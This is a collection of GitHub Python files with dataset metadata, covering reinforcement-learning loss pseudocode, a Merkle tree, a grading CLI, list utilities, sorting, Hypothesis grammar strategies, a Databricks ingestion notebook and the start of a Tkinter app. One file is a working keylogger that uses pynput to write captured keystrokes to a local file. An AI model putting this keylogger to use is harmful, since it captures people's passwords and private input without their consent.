[T, B].\n discounts: If the step is NOT final. Shape [T, B].\n bootstrap: Bootstrap values. Shape [B].\n Returns:\n UPGO return targets. Shape [T, B].\n \"\"\"\n next_values = np.concatenate(\n values[1:], np.expand_dims(bootstrap, axis=0), axis=0)\n # Upgo can be viewed as a lambda return! The trace continues (i.e. lambda =\n # 1.0) if r_t + V_tp1 > V_t.\n lambdas = (rewards + discounts * next_values) >= values\n # Shift lambdas left one slot, such that V_t matches indices with lambda_tp1.\n lambdas = np.concatenate(lambdas[1:], np.ones_like(lambdas[-1:]), axis=0)\n return lambda_returns(next_values, rewards, discounts, lambdas)\n\n\ndef split_upgo_loss(target_logits, baselines, trajectories):\n \"\"\"Computes split UPGO policy gradient loss.\n\n See split_vtrace_pg_loss docstring for details on split updates.\n See Methods for details on UPGO.\n \"\"\"\n # Remove last timestep from trajectories and baselines.\n trajectories = Trajectory(*tuple(t[:-1] for t in trajectories))\n values = baselines[:-1]\n returns = upgo_returns(values, trajectories.rewards, trajectories.discounts,\n baselines[-1])\n\n # Compute the UPGO loss for each action subset.\n loss = 0.\n for action_fields in ['action_type', 'delay', 'arguments']:\n split_target_logits = filter_by(action_fields, target_logits)\n behavior_logits = filter_by(action_fields, trajectories.behavior_logits)\n actions = filter_by(action_fields, trajectories.actions)\n masks = filter_by(action_fields, trajectories.masks)\n\n importance_weights = compute_importance_weights(behavior_logits,\n split_target_logits,\n actions)\n weighted_advantage = (returns - values) * importance_weights\n weighted_advantage = [weighted_advantage] * len(split_target_logits)\n loss += compute_over_actions(policy_gradient_loss, split_target_logits,\n actions, weighted_advantage, masks)\n return loss\n\n\ndef compute_pseudoreward(trajectories, reward_name):\n \"\"\"Computes the relevant pseudoreward from trajectories.\n\n See Methods and detailed_architecture.txt for details.\n \"\"\"\n\n\ndef loss_function(agent, trajectories):\n \"\"\"Computes the loss of trajectories given weights.\"\"\"\n # All ALL_CAPS variables are constants.\n target_logits, baselines = agent.unroll(trajectories)\n\n loss_actor_critic = 0.\n # We use a number of actor-critic losses - one for the winloss baseline, which\n # outputs the probability of victory, and one for each pseudo-reward\n # associated with following the human strategy statistic z.\n # See the paper methods and detailed_architecture.txt for more details.\n for baseline, costs_and_rewards in zip(baselines,\n BASELINE_COSTS_AND_REWARDS):\n pg_cost, baseline_cost, reward_name = costs_and_rewards\n rewards = compute_pseudoreward(trajectories, reward_name)\n loss_actor_critic += (\n baseline_cost * td_lambda_loss(baseline, rewards, trajectories))\n loss_actor_critic += (\n pg_cost\n * split_vtrace_pg_loss(target_logits, baseline, rewards, trajectories))\n\n loss_upgo = UPGO_WEIGHT * split_upgo_loss(\n target_logits, baselines.winloss_baseline, trajectories)\n loss_he = human_policy_kl_loss(trajectories, KL_COST, ACTION_TYPE_KL_COST)\n\n loss_ent = entropy_loss(trajectories.behavior_logits, trajectories.masks)\n loss_ent = loss_ent * ENT_WEIGHT\n\n return loss_actor_critic + loss_upgo + loss_he + loss_ent\n","repo_name":"liuruoze/mini-AlphaStar","sub_path":"res/pseudcode/pseudocode/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","stars":267,"dataset":"github-code","pt":"61"} +{"seq_id":"14198104108","text":"from hashlib import sha256\n\n\nclass Node:\n def __init__(self, left_node, hash, right_node):\n self.left = left_node\n self.hash = hash\n self.right = right_node\n\n\nclass MerkleTree:\n def hash(input_str):\n return sha256(str(input_str).encode('utf-8')).hexdigest()\n\n def generate_tree(datablocks):\n child_nodes = []\n for datablock in datablocks:\n child_nodes.append(Node(None, MerkleTree.hash(datablock), None))\n return MerkleTree.build_tree(child_nodes)\n\n def build_tree(child_nodes):\n parents = []\n while len(child_nodes) != 1:\n index = 0\n length = len(child_nodes)\n while index < length:\n left_child = child_nodes[index]\n right_child = None\n # Add duplicate if tree nodes are odd\n if (index + 1) < length:\n right_child = child_nodes[index + 1]\n else:\n right_child = Node(None, left_child.hash, None)\n parent_hash = MerkleTree.hash(left_child.hash + right_child.hash)\n parents.append(Node(left_child, parent_hash, right_child))\n index += 2\n child_nodes = parents\n parents = []\n return child_nodes[0]\n\n def print_tree(root):\n \"\"\"list contents of the tree nodes level by level\n from root to leaves in reversed BFS order\"\"\"\n if not root:\n return\n if not root.left and not root.right:\n print(root.hash)\n return\n q = [root, None]\n while len(q) > 0:\n node = None\n try:\n node = q.pop(0)\n except:\n pass\n if node:\n print(node.hash)\n else:\n print('')\n if len(q) > 0:\n q.append(None)\n if node and node.left:\n q.append(node.left)\n if node and node.right:\n q.append(node.right)\n \n\ndef test_print():\n tests = [\n ['hello', 'there', '123', 'world'],\n ['1', '2', '3'],\n [1, 2, 3],\n ['a', 'b', 'c', 'd', 'e', 'f', 'g'],\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']]\n for idx, test_datablock in enumerate(tests):\n print(f'Test {idx + 1}: {test_datablock}')\n root = MerkleTree.generate_tree(test_datablock)\n MerkleTree.print_tree(root)\n print('--------------------------------')\n\n\ndef test_comparison():\n def check_integrity(root1, root2):\n print(('Data is genuine.' if root1.hash == root2.hash else 'Data is altered!'))\n \n # Reference and comparison data\n original_data = ['this', 'data', 'is', 'intact']\n original_tree = MerkleTree.generate_tree(original_data)\n modified_data = ['this', 'data', 'is', 'intact']\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n # Modify the comparison data\n modified_data[3] = 'MODIFIED!'\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n # Revert modifications\n modified_data[3] = 'intact'\n modified_tree = MerkleTree.generate_tree(modified_data)\n check_integrity(original_tree, modified_tree)\n\n\ndef main():\n # test_print()\n test_comparison()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"upperdim/merkle-hash-tree","sub_path":"merkle_hash_tree.py","file_name":"merkle_hash_tree.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9417191248","text":"#!/usr/bin/env #!/usr/bin/env python3\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom autograde.cli.audit import cmd_audit\nfrom autograde.cli.build import cmd_build\nfrom autograde.cli.patch import cmd_patch\nfrom autograde.cli.report import cmd_report\nfrom autograde.cli.summary import cmd_summary\nfrom autograde.cli.test import cmd_tst\nfrom autograde.cli.version import cmd_version\nfrom autograde.util import logger, loglevel\n\n\ndef cli(args=None):\n # environment variables\n verbosity = int(os.environ.get('AG_VERBOSITY', 0))\n container_backend = os.environ.get('AG_BACKEND', None)\n container_tag = os.environ.get('AG_TAG', 'autograde')\n\n # command line arguments\n parser = argparse.ArgumentParser(\n description='utility for grading jupyter notebooks',\n epilog='autograde on github: https://github.com/cssh-rwth/autograde',\n prog='autograde',\n )\n\n # global flags\n parser.add_argument('-v', '--verbose', action='count', default=verbosity,\n help='verbosity level')\n parser.add_argument('--backend', type=str, default=container_backend,\n choices=['docker', 'rootless-docker', 'podman'], metavar='',\n help=f'container backend to use, default is {container_backend}')\n parser.add_argument('--tag', type=str, default=container_tag, metavar='',\n help=f'container tag, default: \"{container_tag}\"')\n parser.set_defaults(func=cmd_version)\n\n subparsers = parser.add_subparsers(help='sub command help')\n\n # build sub command\n bld_parser = subparsers.add_parser('build', help=cmd_build.__doc__)\n bld_parser.add_argument('-r', '--requirements', type=Path, default=None,\n help='additional requirements to install')\n bld_parser.add_argument('-q', '--quiet', action='store_true', help='mute output')\n bld_parser.set_defaults(func=cmd_build)\n\n # test sub command\n tst_parser = subparsers.add_parser('test', help=cmd_tst.__doc__)\n tst_parser.add_argument('test', type=str, help='autograde test script')\n tst_parser.add_argument('notebook', type=str, help='the jupyter notebook(s) to be tested')\n tst_parser.add_argument('-t', '--target', type=str, metavar='', help='where to store results')\n tst_parser.add_argument('-c', '--context', type=str, metavar='', help='context directory')\n tst_parser.set_defaults(func=cmd_tst)\n\n # patch sub command\n ptc_parser = subparsers.add_parser('patch', help=cmd_patch.__doc__)\n ptc_parser.add_argument('result', type=str, help='result archive(s) to be patched')\n ptc_parser.add_argument('patch', type=str, help='result archive(s) for patching')\n ptc_parser.set_defaults(func=cmd_patch)\n\n # audit sub command\n adt_parser = subparsers.add_parser('audit', help=cmd_audit.__doc__)\n adt_parser.add_argument('result', type=str, help='result archive(s) to audit')\n adt_parser.add_argument('-b', '--bind', type=str, default='127.0.0.1', help='host to bind to')\n adt_parser.add_argument('-p', '--port', type=int, default=5000, help='port')\n adt_parser.set_defaults(func=cmd_audit)\n\n # report sub command\n rpt_parser = subparsers.add_parser('report', help=cmd_report.__doc__)\n rpt_parser.add_argument('result', type=str, help='result archive(s) for creating the report')\n rpt_parser.set_defaults(func=cmd_report)\n\n # summary sub command\n sum_parser = subparsers.add_parser('summary', help=cmd_summary.__doc__)\n sum_parser.add_argument('result', type=str, help='result archives to summarize')\n sum_parser.set_defaults(func=cmd_summary)\n\n # version sub command\n vrs_parser = subparsers.add_parser('version', help=cmd_version.__doc__)\n vrs_parser.set_defaults(func=cmd_version)\n\n args = parser.parse_args(args)\n\n logger.setLevel(loglevel(args.verbose))\n logger.debug(f'default encoding: {sys.getdefaultencoding()}')\n logger.debug(f'args: {args}')\n\n return args.func(args)\n\n\nif __name__ == '__main__':\n sys.exit(cli())\n","repo_name":"ouseful-backup/autograde","sub_path":"autograde/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"4261010079","text":"from pynput.keyboard import Listener\nimport time\n\nstart_time =0\n\ndef log_keystroke(key):\n key= str(key).replace(\"'\",\"\")\n\n if key == 'Key.space':\n key = ' '\n if key == 'Key.shift_r':\n key = ''\n if key == 'Key.enter':\n key = ' '\n\n\n with open(\"data/keylog.txt\",'a') as f:\n f.write(key)\n\ndef on_release(key):\n if( start_time+20 < time.time()):\n return False\n\nwith Listener(on_press=log_keystroke,on_release = on_release) as l:\n start_time = time.time()\n print(start_time)\n l.join()","repo_name":"ug-31/advanced-keylogger","sub_path":"keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761328494","text":"'''utilities for lists of integers'''\n\ndef str_intgen(x,end=None):\n \"\"\"\n Convert a string such as 2,5-8,10\n Into a generator of integers (2,5,6,7,8,10)\n Also works with :-notation, eg 2,5:9:2,10 becomes (2,5,7,10)\n Note: no sorting or removal of duplicates; sorted(set(...)) will do that\n \"\"\"\n if x:\n for part in x.split(','):\n if ':' in part:\n abc = part.split(':')\n intabc = [int(_) for _ in abc]\n for n in range(*intabc):\n yield n\n elif '-' in part:\n a, b = part.split('-')\n if not b and end is not None:\n b=end\n a, b = int(a), int(b)\n for n in range(a, b + 1):\n yield n\n else:\n n = int(part)\n yield n\n\ndef string_to_intlist(x,end=None):\n \"\"\"\n Convert a string such as 2,5-8,10\n Into a list of integers [2,5,6,7,8,10]\n Also works with :-notation, eg 2,5:9:2,10 becomes [2,5,7,10]\n Note: no sorting or removal of duplicates; sorted(set(...)) will do that\n \"\"\"\n return list(str_intgen(x,end=end))\n\n\ndef string_to_intlist_old(x,end=None):\n \"\"\"\n Deprecated -- see string_to_intlist\n \"\"\"\n result = []\n for part in x.split(','):\n if ':' in part:\n abc = part.split(':')\n intabc = [int(_) for _ in abc]\n result.extend(range(*intabc))\n #print \"part=\",part,\"intabc=\",intabc,\"result=\",result #debug\n elif '-' in part:\n a, b = part.split('-')\n if not b and end is not None:\n b=end\n a, b = int(a), int(b)\n result.extend(range(a, b + 1))\n elif \"\" == part:\n pass\n else:\n a = int(part)\n result.append(a)\n return result\n\ndef format_intlist(nlist,width=79,intro=\"\"):\n '''write out a list of integers neatly over several lines,\n separated by commas, and lined up nicely in columns. eg:\n nlist = range(25), width=50, intro=\"Sites:\" produces\n Sites: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,\n 20, 21, 22, 23, 24\n '''\n maxwid = max(len(str(n)) for n in nlist)\n fmt = f\"%{maxwid}d\"\n nperline = (width - len(intro)) // (maxwid+2)\n nlines = 1 + len(nlist) // nperline\n lines=[]\n for nl in range(nlines):\n introstr = intro if nl==0 else \" \"*len(intro)\n nbot = nl*nperline\n ntop = min([nl*nperline + nperline,len(nlist)])\n nslice = slice(nbot, ntop)\n if ntop>nbot:\n lines.append(introstr + \", \".join(fmt % n for n in nlist[nslice]))\n return lines\n\ndef intlist_to_string(nlist,sort=False):\n '''inverse of string_to_intlist,\n eg, [1,2,3,6,7,9,10,11] --> \"1-3,6,7,9-11\"\n '''\n if len(nlist)==0:\n return \"\"\n if sort:\n ## sort and also remove duplicates\n nlist = sorted(set(nlist))\n slist=[]\n nlo = nhi = nlist[0]\n for n in list(nlist[1:]) + [None]:\n if n == nhi+1:\n nhi = n\n else:\n if nlo==nhi:\n slist.append( str(nlo) )\n elif nhi==nlo+1:\n slist.append( str(nlo) + \",\" + str(nhi) )\n elif nhi>nlo+1:\n slist.append( str(nlo) + \"-\" + str(nhi) )\n nlo = nhi = n\n\n return \",\".join(slist)\n\n\n\ndef write_numbers_vertically(nlist,plusone=0,leadingzero=' '):\n '''\n write numbers vertically so one number per column;\n eg, input: nlist = [80, 96, 175, 515]\n output three lines:\n ..15\n 8971\n 0655\n '''\n\n if nlist is None or len(nlist)==0:\n return []\n\n lines = []\n rlist = []\n nlist = [n+plusone for n in nlist]\n while max(nlist)>0:\n rlist.append( [str(n%10) for n in nlist] )\n nlist = [n//10 for n in nlist]\n rlist = rlist[::-1]\n\n ## Replace leading 0's with space\n for j in range(len(rlist[0])):\n for k in range(len(rlist)):\n if rlist[k][j] == '0':\n rlist[k][j] = leadingzero\n else:\n break\n\n for r in rlist:\n lines.append(\"\".join(r))\n return lines\n\ndef intlist_to_rangelist(intlist):\n '''\n input: 1,2,3,7,8,9,58,59,60,61\n output: (1,4),(7,10),(58,62)\n '''\n intlist = sorted(intlist) #make sure list is sorted\n rangelist = []\n nprev=lo=hi=None\n for n in intlist + [None]:\n if n is None:\n rangelist.append( (lo,hi) )\n break\n if lo is None:\n lo = nprev = n\n hi = n+1\n continue\n if n > nprev+1:\n rangelist.append( (lo,hi) )\n lo = n\n nprev = n\n hi = n+1\n return rangelist\n\n\n\nif __name__ == \"__main__\":\n\n for s in [\"2,5-8,10\",\"2,5-8,10-12\"]:\n nlist = string_to_intlist(s)\n print(s,nlist)\n rlist = intlist_to_rangelist(nlist)\n print(s,rlist)\n s=\"2,5-8,10-\"\n print(s,string_to_intlist(s,end=20))\n\n print(\"Empty:\",string_to_intlist_old(\"\"))\n print(\"None:\",string_to_intlist(None))\n print(\"Empty:\",string_to_intlist(\"\"))\n print(\"Zero:\",string_to_intlist(\"0\"))\n\n nlist = [80,90,145,2,3567,3456,124]\n lines = write_numbers_vertically(nlist)\n print(nlist,\":\")\n print(\"\\n\".join(lines))\n","repo_name":"jt-lanl/cov-voc","sub_path":"intlist.py","file_name":"intlist.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27813568694","text":"'''\nJoao Marcos\nMerge Sort implementation\n'''\n\n\ndef merge(left, right):\n \"\"\"Merge sort merging function.\"\"\"\n\n left_index, right_index = 0, 0\n result = []\n while left_index < len(left) and right_index < len(right):\n if left[left_index] < right[right_index]:\n result.append(left[left_index])\n left_index += 1\n else:\n result.append(right[right_index])\n right_index += 1\n\n result += left[left_index:]\n result += right[right_index:]\n return result\n\n\ndef merge_sort(array):\n if len(array) <= 1: # base case\n return array\n\n # divide array in half and merge sort recursively\n half = len(array) // 2\n left = merge_sort(array[:half])\n right = merge_sort(array[half:])\n\n return merge(left, right)\n\nmerge_sort([3,4,5,1,2,8,3,7,6])\n","repo_name":"arademaker/ED-2017-2","sub_path":"src/Mergesort-JoaoMarcos.py","file_name":"Mergesort-JoaoMarcos.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74681979074","text":"# This program is for Representing Priority Queues with a Heap (heappop).\n\nfrom heapq import heappush\nfrom heapq import heappop\n\nprint(\"\\n\\t\\t********PROGRAMMED BY:********\")\nprint(\"\\t\\t***BEVERLY ANN L. RODRIGUEZ***\\n\")\n\n# The first element on a heap always has the smallest (min-heap) or the highest (max-heap) \n# value, depending on how you define the condition for the mentioned relationship. \nvegetables = []\nheappush(vegetables, \"Squash\")\nheappush(vegetables, \"Letuce\")\nheappush(vegetables, \"Eggplant\")\nheappush(vegetables, \"Cucumber\")\nheappush(vegetables, \"Celery\")\n\n\n# When you pop an element from a heap, you’ll always get the first one, \n# while the remaining elements might shuffle a little bit\nprint(heappop(vegetables))\nprint(\"These are the remaining elements: \\n\\t\",vegetables)\n\n\n","repo_name":"BeverlyRodriguez/PythonStacksQueuesPriorities","sub_path":"PriorityHeappop.py","file_name":"PriorityHeappop.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21864994026","text":"from hypothesis import assume\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import composite, lists, sampled_from\n\nfrom .symbols import symbol_items\n\nfrom .forms import form_items\n\nfrom .separators import separator_strings\n\nfrom custom.label.tagged_literals import label\nfrom custom.verify.tagged_literals import verify, verify_with_metadata\nfrom custom.parameters import metadata_max\n\nfrom .util import make_form_with_metadata_str_builder\n\nmarker = '#'\n\n# XXX: could also have stuff before and after delimiters\ndef build_tagged_literal_str(tagged_literal_item):\n form_item = tagged_literal_item[\"inputs\"]\n form_str = form_item[\"to_str\"](form_item)\n #\n seps = tagged_literal_item[\"separators\"]\n #\n tag_item = tagged_literal_item[\"tag\"]\n tag_str = tag_item[\"to_str\"](tag_item)\n #\n # XXX: consider again later\n #return marker + seps[0] + tag_str + seps[1] + form_str\n return marker + tag_str + \" \" + form_str\n\n@composite\ndef tag_items(draw):\n # XXX: symbol with metadata should be possible too...\n # may need to go over other parts of code to find\n # similar cases\n tag_item = draw(symbol_items())\n #\n # \"# followed immediately by a symbol starting with an alphabetic\n # character indicates that that symbol is a tag\"\n #\n # via: https://github.com/edn-format/edn#tagged-elements\n #\n tag_head = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\",\n \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\",\n \"u\", \"v\", \"w\", \"x\", \"y\", \"z\",\n \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\",\n \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\",\n \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\n tag_head_str = draw(sampled_from(tag_head))\n #\n tag_item[\"inputs\"] = tag_head_str + tag_item[\"inputs\"]\n #\n return tag_item\n\n@composite\ndef bare_tagged_literal_items(draw,\n separators=separator_strings(),\n label=label,\n verify=verify):\n #\n form_item = draw(form_items())\n #\n tag_item = draw(tag_items())\n #\n sep_strs = draw(lists(elements=separators,\n min_size=2, max_size=2))\n return {\"inputs\": form_item,\n \"label\": label,\n \"to_str\": build_tagged_literal_str,\n \"verify\": verify,\n \"tag\": tag_item,\n \"separators\": sep_strs,\n \"marker\": marker}\n\n@composite\ndef tagged_literal_with_metadata_items(draw,\n separators=separator_strings(),\n metadata=\"metadata\",\n label=label,\n verify=verify_with_metadata):\n # avoid circular dependency\n from .metadata import metadata_items, check_metadata_flavor\n #\n check_metadata_flavor(metadata)\n #\n tl_item = draw(bare_tagged_literal_items(separators=separators,\n label=label,\n verify=verify))\n #\n str_builder = \\\n make_form_with_metadata_str_builder(build_tagged_literal_str)\n #\n n = draw(integers(min_value=1, max_value=metadata_max))\n #\n md_items = draw(lists(elements=metadata_items(flavor=metadata),\n min_size=n, max_size=n))\n #\n tl_item.update({\"to_str\": str_builder,\n \"metadata\": md_items})\n #\n return tl_item\n\n@composite\ndef tagged_literal_items(draw,\n separators=separator_strings(),\n metadata=False,\n label=label,\n verify=verify):\n if not metadata:\n return draw(bare_tagged_literal_items(separators=separators,\n label=label,\n verify=verify))\n else:\n return \\\n draw(tagged_literal_with_metadata_items(separators=separators,\n metadata=metadata,\n label=label,\n verify=verify))\n","repo_name":"sogaiu/hypothesis-grammar-clojure","sub_path":"hypothesis_grammar_clojure/tagged_literals.py","file_name":"tagged_literals.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9272641352","text":"# Databricks notebook source\n# MAGIC %md-sandbox\n# MAGIC\n# MAGIC
      \n# MAGIC \"Databricks\n# MAGIC
      \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Auto Load Data to Multiplex Bronze\n# MAGIC\n# MAGIC チーフアーキテクトは、Kafkaに直接接続するのではなく、ソースシステムが生のレコードをJSONファイルとしてクラウドオブジェクトストレージに送信することを決定しました。このノートブックでは、Auto Loader でこれらのレコードを取り込み、このインクリメンタルフィードの全履歴を保存するマルチプレックステーブルを構築します。初期テーブルには、すべてのトピックのデータが格納され、次のスキーマを持ちます。\n# MAGIC\n# MAGIC | Field | Type |\n# MAGIC | --- | --- |\n# MAGIC | key | BINARY |\n# MAGIC | value | BINARY |\n# MAGIC | topic | STRING |\n# MAGIC | partition | LONG |\n# MAGIC | offset | LONG\n# MAGIC | timestamp | LONG |\n# MAGIC | date | DATE |\n# MAGIC | week_part | STRING |\n# MAGIC\n# MAGIC この1つのテーブルが、ターゲット・アーキテクチャを通じてデータの大部分を動かし、相互に依存する3つのデータ・パイプラインに供給する。\n# MAGIC\n# MAGIC \n# MAGIC\n# MAGIC **NOTE**: Kafkaに接続するための追加設定の詳細については、以下をご覧ください。 here.\n# MAGIC\n# MAGIC\n# MAGIC ## このレッスンの終わりまでに、以下のことができるようになります:\n# MAGIC - マルチプレックス設計の説明\n# MAGIC - オートローダを適用してレコードをインクリメンタルに処理する\n# MAGIC - トリガ間隔の構成\n# MAGIC - \"trigger-available-now\"ロジックを使用して、データのトリガーによるインクリメンタルローディングを実行する\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC 次のセルは、このノートブック全体で必要なパスを宣言している。\n\n# COMMAND ----------\n\n# MAGIC %run ../Includes/Classroom-Setup-3.1\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC このトレーニングの例では、すべてのレコードは DBFS ルートに保存されます。\n# MAGIC\n# MAGIC 開発環境でも本番環境でも、データのレイヤーごとに別々のデータベースとストレージアカウントを設定することが望ましい。\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## ソース・データの検査\n# MAGIC\n# MAGIC データファイルは以下の変数で指定されたパスに書き込まれる。\n# MAGIC\n# MAGIC 以下のセルを実行して、ソース・データのスキーマを調べ、取り込まれる際に変更が必要かどうかを判断してください。\n\n# COMMAND ----------\n\nspark.read.json(DA.paths.source_daily).printSchema()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 日付ルックアップテーブルで結合するデータを準備する\n# MAGIC 初期化スクリプトは **`date_lookup`** テーブルをロードした。このテーブルにはあらかじめ計算された日付の値がいくつもある。休日や会計四半期を示す追加のフィールドが、後でデータを充実させるためにこのテーブルに追加されることがよくあることに注意してください。\n# MAGIC\n# MAGIC これらの値の事前計算と保存は、文字列パターン **`YYYY-WW`** を使用して、年と週でデータをパーティショニングしたい場合に特に重要です。Sparkには、 **`year`** と **`weekofyear`** の両方の関数が組み込まれていますが、 **`year`** と **`weekofyear`** の両方の関数を使用することはできません。 \n# MAGIC **`weekofyear`** 関数は、12月最終週や12月最終週、1月最初の週の日付に対して期待される動作を提供しない可能性があります。3日以上ある最初の週を第1週と定義しているためです。\n# MAGIC\n# MAGIC このエッジケースはSparkにとっては難解ですが、組織全体で使用される **`date_lookup`** テーブルは、データが一貫して日付関連の詳細で充実していることを確認するために重要です。\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC\n# MAGIC DESCRIBE date_lookup\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC select * from date_lookup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC 現在実装されているテーブルでは、各 **`date`** に対して正確な **`week_part`** を取得する必要があります。\n# MAGIC\n# MAGIC 以下の呼び出しは、後続の結合操作に必要な **`DataFrame`** を作成します。\n\n# COMMAND ----------\n\ndate_lookup_df = spark.table(\"date_lookup\").select(\"date\", \"week_part\")\n\n# COMMAND ----------\n\ndisplay(date_lookup_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **`DA.paths.source_daily`** に格納されているJSONデータを使用して、必要に応じて **`timestamp`** カラムを変換し、 **`date`** カラムと結合します。\n\n# COMMAND ----------\n\njson_df = spark.read.json(DA.paths.source_daily)\ndisplay(json_df)\n\n# COMMAND ----------\n\n# TODO\nfrom pyspark.sql import functions as F\njson_df = spark.read.json(DA.paths.source_daily)\n \njoined_df = (json_df.join(F.broadcast(date_lookup_df),\n F.to_date((F.col(\"timestamp\")/1000).cast(\"timestamp\")) == F.col(\"date\"),\n \"left\"))\n \ndisplay(joined_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## 多重ブロンズテーブルへのトリガーインクリメンタルオートローディングの定義\n# MAGIC\n# MAGIC 以下は、ソース・ディレクトリからブロンズ・テーブルへのデータをインクリメンタルに処理し、最初の書き込み中にテーブルを作成する関数のスターター・コードです。\n# MAGIC\n# MAGIC 不足しているコードを以下に示します:\n# MAGIC - Auto Loader を使用するようにストリームを構成する\n# MAGIC - JSON 形式を使用するように Auto Loader を構成する。\n# MAGIC - date_lookupテーブルとブロードキャスト結合を実行する。\n# MAGIC - **`topic`** フィールドと **`week_part`** フィールドでデータをパーティションする。\n\n# COMMAND ----------\n\n# TODO\ndef process_bronze():\n query = (spark.readStream\n .format(\"cloudFiles\")\n .option(\"cloudFiles.format\", \"json\")\n .option(\"cloudFiles.schemaLocation\", f\"{DA.paths.checkpoints}/bronze_schema\")\n .load(DA.paths.source_daily)\n .join(F.broadcast(date_lookup_df), F.to_date((F.col(\"timestamp\")/1000).cast(\"timestamp\")) == F.col(\"date\"), \"left\")\n .writeStream\n .option(\"checkpointLocation\", f\"{DA.paths.checkpoints}/bronze\")\n .partitionBy(\"topic\", \"week_part\")\n .trigger(availableNow=True)\n .table(\"bronze\"))\n \n query.awaitTermination()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC 以下のセルを実行して、データの増分バッチを処理する。\n\n# COMMAND ----------\n\nprocess_bronze()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC 処理されたレコードの数を確認する。\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT COUNT(*) FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC データをプレビューし、レコードが正しく取り込まれていることを確認する。\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC 以下の **`DA.daily_stream.load()`** コードは、ソース・ディレクトリに新しいデータを取り込むためのヘルパー・クラスです。\n# MAGIC\n# MAGIC 以下のセルを実行すると、新しいバッチが正常に処理されます。\n\n# COMMAND ----------\n\nDA.daily_stream.load()\n\n# COMMAND ----------\n\nprocess_bronze()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Confirm the count is now higher.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT COUNT(*) FROM bronze\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Run the following cell to delete the tables and files associated with this lesson.\n\n# COMMAND ----------\n\nDA.cleanup()\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2022 Databricks, Inc. All rights reserved.
      \n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
      \n# MAGIC
      \n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"skotani-db/partner-elevate","sub_path":"Advanced-Data-Engineering-with-Databricks-JA/02 - Bronze Ingestion Patterns/ADE 2.1 - Auto Load to Multiplex Bronze.py","file_name":"ADE 2.1 - Auto Load to Multiplex Bronze.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"11318009807","text":"try:\n import tkinter\nexcept:\n import Tkinter as tkinter\nimport pathlib\nimport time\ntry:\n from tkinter import messagebox\nexcept:\n import tkMessageBox\nimport shutil\nimport subprocess\nimport sys\nimport os.path\n\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\n\nclass FocusApp:\n \"\"\"\n Class that stores the entire focus app\n \"\"\"\n def __init__(self):\n \"\"\"Initialises all the required variables\"\"\"\n self.rootWidth = 500\n self.rootHeight = 150\n self.sliderWidth = 400\n self.sliderHeight = 70\n self.buttonWidth = 50\n self.buttonHeight = 20\n self.timerBeingDisplayed = False\n\n # Start building the GUI here\n self.parentWindow = tkinter.Tk()\n self.parentWindow.title(\"FocusApp\")\n self.parentWindow.geometry(str(self.rootWidth) + 